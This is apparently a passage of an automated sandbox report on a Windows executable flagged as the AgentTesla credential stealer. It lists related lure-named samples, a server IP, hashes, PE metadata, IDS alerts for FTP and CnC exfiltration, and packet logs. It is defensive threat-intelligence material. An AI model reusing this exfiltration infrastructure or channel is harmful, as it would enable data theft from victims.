                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ftp.normagroup.com.trhesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          19-03-2024_Takas_Sonuclari.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-14-06-2024.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi01.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi01--.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ASN-QUADRANET-GLOBALUShesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          RFQ678903423_PROD_HASUE_de_Mexico_ExportS.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                                          • 64.188.26.202
                                          BNP DOC 12578945329763-7633562829.exeGet hashmaliciousRemcosBrowse
                                          • 104.223.119.206
                                          19-03-2024_Takas_Sonuclari.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          SWU5109523I.exeGet hashmaliciousFormBook, LokibotBrowse
                                          • 104.129.27.23
                                          BL-RTM1439068.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                          • 64.188.16.157
                                          Hecker Glastechnik - Bestellung #009449 PDF.wsfGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 45.66.217.104
                                          AWB Shipping Docs No-285380XXX.exeGet hashmaliciousRemcosBrowse
                                          • 104.223.119.206
                                          UNCR76301078976375.wsfGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 45.66.217.104

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\hesaphareketi-.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1500
                                          Entropy (8bit):5.345358309061185
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAHQ
                                          MD5:215B3562F83C4FB9BBB129D2F9E59ADA
                                          SHA1:0534A53F6F42ECA7E56EB02E328A2025254AC511
                                          SHA-256:4CF4451F940D8D730D8209079E1404A1EAD1A36C33E69AB8AE43E0E7D33B4450
                                          SHA-512:E09A97CE89258E1BCDA4832E1348720EBCD462E0C81736CCAD8D99AB1AC60ECBAF5E1F552C4F0977F498D25E27739197D2A9C1EFFDEB7116020D106231EB7C43
                                          Malicious:true
                                          Reputation:low
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.379460230152629
                                          Encrypted:false
                                          SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:fLHyIFKL3IZ2KRH9Oug8s
                                          MD5:5EDBE2AEEFE69FB36ECED2E31AC9386F
                                          SHA1:6614C7900E4994E1A3606D22916BE68F701A19D4
                                          SHA-256:4275A59302475C8198165F4EB61EA2A88BD12056EA6EE5197C1BF8E6B6A6F9FD
                                          SHA-512:CFBAB752BE8CB209B25F2D1AD30E08E5E7ADB2EE5B4CCE98DCFD20B05E4B1CEFFCB6551556B134A2123412C864A8A544701C846F204783D99CB58936DC086A76
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4z0buiv1.ooi.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a30523rr.ef2.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbbsthxn.no0.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zibpkynz.v4s.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.920971759355091
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:hesaphareketi-.exe
                                          File size:661'504 bytes
                                          MD5:c96c8178b1018515d4b43e614a3e3f15
                                          SHA1:8a6601c7aff694ba0843e807a7a1a57bc3cb3665
                                          SHA256:2ca8a08a83d98fbae1d8683cdb828b64216f9849ee539e09198db53876d419e9
                                          SHA512:4d8a0d5a48264df61ed446487eca1593b3bf08633898ce4af5fc8896bdf213653ea2c426fb888ebe2ee5afeceb6f5c4ecdf84ca5155e5135aa37c0f338c163b5
                                          SSDEEP:12288:V5WsXbCawKw4NN3AML30AptH5dIV46qlBghWblKOdB/yMi4ZtMn5HMbGxcbr/5vk:BwkP3AMrzZOPQ1xyMi4ZtqMbA0r/5s
                                          TLSH:FFE40299B3296E2FC63E7DFD1480250903BDA1622193D7C48CC765DA2EC7FF99690063
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|f.............................,... ...@....@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00928e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x4a2c12
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x667CF7A7 [Thu Jun 27 05:24:55 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa2bb80x57.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x598.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xa0c180xa0e00fe488661aadf874ba03081502e520812False0.9210919289044289data7.927355797624177IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xa40000x5980x60001bfe6eeb9195bca6713d6c9e48ba956False0.427734375data4.393428476676741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xa60000xc0x20006542b07575fc5ae8277e43b94d369d2False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0xa40a00x344data0.43301435406698563
                                          RT_MANIFEST0xa43e40x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          06/27/24-09:19:54.944296TCP2029927ET TROJAN AgentTesla Exfil via FTP4970321192.168.2.7104.247.165.99
                                          06/27/24-09:19:55.631016TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4970653607192.168.2.7104.247.165.99
                                          06/27/24-09:19:55.631016TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4970653607192.168.2.7104.247.165.99

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jun 27, 2024 09:19:52.674730062 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:52.681380987 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:52.681462049 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:53.587408066 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:53.587594032 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:53.587610006 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:53.587685108 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:53.592729092 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:53.808285952 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:53.808502913 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:53.813299894 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.050478935 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.050651073 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:54.056863070 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.274281025 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.274454117 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:54.279795885 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.496164083 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.496341944 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:54.501358986 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.716557026 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.716708899 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:54.721515894 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.937917948 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.939178944 CEST4970653607192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:54.944087982 CEST5360749706104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:54.944169044 CEST4970653607192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:54.944295883 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:54.949136019 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:55.630709887 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:55.631016016 CEST4970653607192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:55.631059885 CEST4970653607192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:55.635910988 CEST5360749706104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:55.636472940 CEST5360749706104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:55.636576891 CEST4970653607192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:55.678838015 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:19:55.862613916 CEST2149703104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:19:55.913278103 CEST4970321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:35.699003935 CEST4971421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:35.704093933 CEST2149714104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:35.704216003 CEST4971421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:35.711002111 CEST4971421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:35.716027021 CEST2149714104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:35.716100931 CEST4971421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:44.808110952 CEST4971521192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:44.813519955 CEST2149715104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:44.813728094 CEST4971521192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:44.813947916 CEST4971521192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:44.819710016 CEST2149715104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:44.819859982 CEST4971521192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:50.145797014 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:50.150688887 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:50.150775909 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:50.755276918 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:50.757167101 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:50.761991978 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:50.971409082 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:50.978455067 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:50.983437061 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:51.241735935 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:51.242409945 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:51.247179985 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:51.456182957 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:51.456425905 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:51.462630033 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:51.671273947 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:51.671910048 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:51.676794052 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:51.885766983 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:51.886185884 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:51.891463995 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.100177050 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.100805998 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.105747938 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.105819941 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.105901003 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.110704899 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.719655037 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.720005035 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.725162983 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.725184917 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.725198030 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.725210905 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.725228071 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.725234032 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.725302935 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.725348949 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.725367069 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.725402117 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.725414991 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.725414991 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.725456953 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.725461006 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.725562096 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.730127096 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.730179071 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.730192900 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.730195999 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.730242014 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.730262995 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.730308056 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.730350018 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.730382919 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.731211901 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.731261969 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.731318951 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.731347084 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.731379986 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.731426954 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.731431007 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.731487036 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.735079050 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.735140085 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.735255003 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.735272884 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.736325979 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.736349106 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.736402988 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.736452103 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.736521006 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.736535072 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.736550093 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.736598969 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.740032911 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.740598917 CEST6073449717104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:21:52.740652084 CEST4971760734192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:52.824430943 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:21:53.177844048 CEST2149716104.247.165.99192.168.2.7
